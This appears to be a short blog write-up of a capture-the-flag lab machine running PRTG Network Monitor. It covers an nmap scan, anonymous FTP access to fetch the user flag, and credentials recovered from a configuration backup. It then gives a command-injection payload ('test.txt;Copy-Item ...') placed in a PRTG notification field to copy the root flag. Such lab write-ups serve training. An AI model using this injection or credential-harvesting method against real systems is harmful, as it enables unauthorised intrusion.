root@blog:~#

View on GitHub

neymon

RECON

PRTG Network Monitor

recon

Nmap Scan

nmap -sC -sV 10.10.10.152

Anonymous FTP login allowed

nmap

ENUMURATION

FTP

ftp 10.10.10.152

ftp

User Flag

ls
cd Users/Public
get user.txt

userflag

Privilege Escalation

Looking through Config files

prtg

User and password in PRTG Configuration.old.bak

loginu

Log into Netmon using 2019 for updated crenditals (box release year)

welcome

Root Flag

Looking for PRTG Network Monitor vulnearbilies

cve

Blog post about exploitation method

walkthrough

Add Notification: Setup > Account Settings > Notifications

add noti

Powershell to transfer

copyitem

Formating transfer

test.txt;Copy-Item "C:\Users\Administrator\Desktop\root.txt" -Destination "C:\Users\Public\root.txt"

e x

Anonymous FTP succesfull transfer

root